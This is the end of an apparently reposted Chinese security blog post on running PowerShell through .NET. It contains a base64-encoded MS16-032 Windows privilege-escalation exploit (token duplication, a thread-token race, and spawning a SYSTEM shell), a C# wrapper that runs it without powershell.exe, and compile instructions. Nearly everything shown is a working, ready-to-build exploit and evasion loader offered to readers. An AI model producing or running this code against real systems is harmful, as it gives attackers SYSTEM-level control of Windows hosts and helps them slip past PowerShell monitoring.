heSl7CiAgICAKICAgICAgICAjIEdldCBoYW5kbGUgdG8gU1lTVEVNIGFjY2VzcyB0b2tlbgogICAgICAgIEdldC1TeXN0ZW1Ub2tlbgogICAgICAgIAogICAgICAgIGVjaG8gImBuWypdIFNuaWZmaW5nIG91dCBTWVNURU0gc2hlbGwuLiIKICAgICAgICBlY2hvICJgbls+XSBEdXBsaWNhdGluZyBTWVNURU0gdG9rZW4iCiAgICAgICAgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSA9IFtJbnRQdHJdOjpaZXJvCiAgICAgICAgJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpEdXBsaWNhdGVUb2tlbigkU3lzVG9rZW5IYW5kbGUsIDIsIFtyZWZdJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAKICAgICAgICAjIFNpbXBsZSBQUyBydW5zcGFjZSBkZWZpbml0aW9uCiAgICAgICAgZWNobyAiWz5dIFN0YXJ0aW5nIHRva2VuIHJhY2UiCiAgICAgICAgJFJ1bnNwYWNlID0gW3J1bnNwYWNlZmFjdG9yeV06OkNyZWF0ZVJ1bnNwYWNlKCkKICAgICAgICAkU3RhcnRUb2tlblJhY2UgPSBbcG93ZXJzaGVsbF06OkNyZWF0ZSgpCiAgICAgICAgJFN0YXJ0VG9rZW5SYWNlLnJ1bnNwYWNlID0gJFJ1bnNwYWNlCiAgICAgICAgJFJ1bnNwYWNlLk9wZW4oKQogICAgICAgIFt2b2lkXSRTdGFydFRva2VuUmFjZS5BZGRTY3JpcHQoewogICAgICAgICAgICBQYXJhbSAoJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAgICAgd2hpbGUgKCR0cnVlKSB7CiAgICAgICAgICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAgICAgfQogICAgICAgIH0pLkFkZEFyZ3VtZW50KCRUaHJlYWQpLkFkZEFyZ3VtZW50KCRoRHVwbGljYXRlVG9rZW5IYW5kbGUpCiAgICAgICAgJEFzY09iaiA9ICRTdGFydFRva2VuUmFjZS5CZWdpbkludm9rZSgpCiAgICAgICAgCiAgICAgICAgZWNobyAiWz5dIFN0YXJ0aW5nIHByb2Nlc3MgcmFjZSIKICAgICAgICAjIEFkZGluZyBhIHRpbWVvdXQgKDEwIHNlY29uZHMpIGhlcmUgdG8gc2FmZWd1YXJkIGZyb20gZWRnZS1jYXNlcwogICAgICAgICRTYWZlR3VhcmQgPSBbZGlhZ25vc3RpY3Muc3RvcHdhdGNoXTo6U3RhcnROZXcoKQogICAgICAgIHdoaWxlICgkU2FmZUd1YXJkLkVsYXBzZWRNaWxsaXNlY29uZHMgLWx0IDEwMDAwKSB7CiAgICAgICAgIyBTdGFydHVwSW5mbyBTdHJ1Y3QKICAgICAgICAkU3RhcnR1cEluZm8gPSBOZXctT2JqZWN0IFNUQVJUVVBJTkZPCiAgICAgICAgJFN0YXJ0dXBJbmZvLmNiID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6U2l6ZU9mKCRTdGFydHVwSW5mbykgIyBTdHJ1Y3QgU2l6ZQogICAgICAgICRTdGFydHVwSW5mby5kd0ZsYWdzID0gMHgwMDAwMDEwMSAjIFNUQVJURl9VU0VTVERIQU5ETEVTCiAgICAgICAgICAgICRTdGFydHVwSW5mby53U2hvd1dpbmRvdyA9IDA7CiAgICAgICAgIyBQcm9jZXNzSW5mbyBTdHJ1Y3QKICAgICAgICAkUHJvY2Vzc0luZm8gPSBOZXctT2JqZWN0IFBST0NFU1NfSU5GT1JNQVRJT04KICAgICAgICAKICAgICAgICAjIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XIC0tPiBscEN1cnJlbnREaXJlY3RvcnkKICAgICAgICAkR2V0Q3VycmVudFBhdGggPSAoR2V0LUl0ZW0gLVBhdGggIi5cIiAtVmVyYm9zZSkuRnVsbE5hbWUKICAgICAgICAKICAgICAgICAjIExPR09OX05FVENSRURFTlRJQUxTX09OTFkgLyBDUkVBVEVfU1VTUEVOREVECiAgICAgICAgJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpDcmVhdGVQcm9jZXNzV2l0aExvZ29uVygKICAgICAgICAgICAgInVzZXIiLCAiZG9tYWluIiwgInBhc3MiLAogICAgICAgICAgICAweDAwMDAwMDAyLCAkQXBwbGljYXRpb24sJENvbW1hbmRsaW5lLAogICAgICAgICAgICAweDAwMDAwMDA0LCAkbnVsbCwgJEdldEN1cnJlbnRQYXRoLAogICAgICAgICAgICBbcmVmXSRTdGFydHVwSW5mbywgW3JlZl0kUHJvY2Vzc0luZm8pCiAgICAgICAgICAgIAogICAgICAgICRoVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybwogICAgICAgICRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblByb2Nlc3NUb2tlbigkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDB4MjgsIFtyZWZdJGhUb2tlbkhhbmRsZSkKICAgICAgICAjIElmIHdlIGNhbid0IG9wZW4gdGhlIHByb2Nlc3MgdG9rZW4gaXQncyBhIFNZU1RFTSBzaGVsbCEKICAgICAgICBpZiAoISRDYWxsUmVzdWx0KSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBIb2x5IGhhbmRsZSBsZWFrIEJhdG1hbiwgd2UgaGF2ZSBhIFNZU1RFTSBzaGVsbCEhYG4iCiAgICAgICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6UmVzdW1lVGhyZWFkKCRQcm9jZXNzSW5mby5oVGhyZWFkKQogICAgICAgICAgICAkU3RhcnRUb2tlblJhY2UuU3RvcCgpCiAgICAgICAgICAgICRTYWZlR3VhcmQuU3RvcCgpCiAgICAgICAgICAgIFJldHVybgogICAgICAgIH0KICAgICAgICAgICAgCiAgICAgICAgIyBDbGVhbiB1cCBzdXNwZW5kZWQgcHJvY2VzcwogICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6VGVybWluYXRlUHJvY2VzcygkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDEpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFRocmVhZCkKICAgICAgICB9CiAgICAgICAgCiAgICAgICAgIyBLaWxsIHJ1bnNwYWNlICYgc3RvcHdhdGNoIGlmIGVkZ2UtY2FzZQogICAgICAgICRTdGFydFRva2VuUmFjZS5TdG9wKCkKICAgICAgICAkU2FmZUd1YXJkLlN0b3AoKQogICAgfQp9"));         public void ExecuteSynchronously(string aplication,string commandline)         {             string Commandout;             InitialSessionState iss = InitialSessionState.CreateDefault();             Runspace rs = RunspaceFactory.CreateRunspace(iss);             rs.Open();             PowerShell ps = PowerShell.Create();             ps.Runspace = rs;             ps.AddScript(PSInvoke_MS16_032);             if (commandline != "")             {                  Commandout = "Invoke-MS16-032 -Application /"" + aplication + "/" -Commandline " + "/""+commandline+"/"";             }             else{                  Commandout = "Invoke-MS16-032 -Application " + aplication;             }             Console.WriteLine(Commandout);             ps.AddScript(Commandout);             ps.AddCommand("Out-Default");             ps.Invoke();             rs.Close();         }     } } 

base64的内容是 https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 的所有内容的base64编码(你可以使用你自己的powershell脚本),由于我改的这个是有参数的,所以简单的写了上面的c#代码,通过.net来执行powershell。

编译需要System.Management.Automation.dll,具体步骤在cs文件里面已经写了,你们自己编译吧,只是对本机进行了测试,没测试别的,测试Demo如下:

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

通过.net来执行powershell,并不需要powershell.exe 。详情可以看一下 [link href="https://github.com/Cn33liz/p0wnedShell"]p0wnedShell[/link] 或者 http://zone.wooyun.org/content/26831

原文  http://evi1cg.me/archives/Compile_Your_Powreshell_Script.html
正文到此结束
Loading...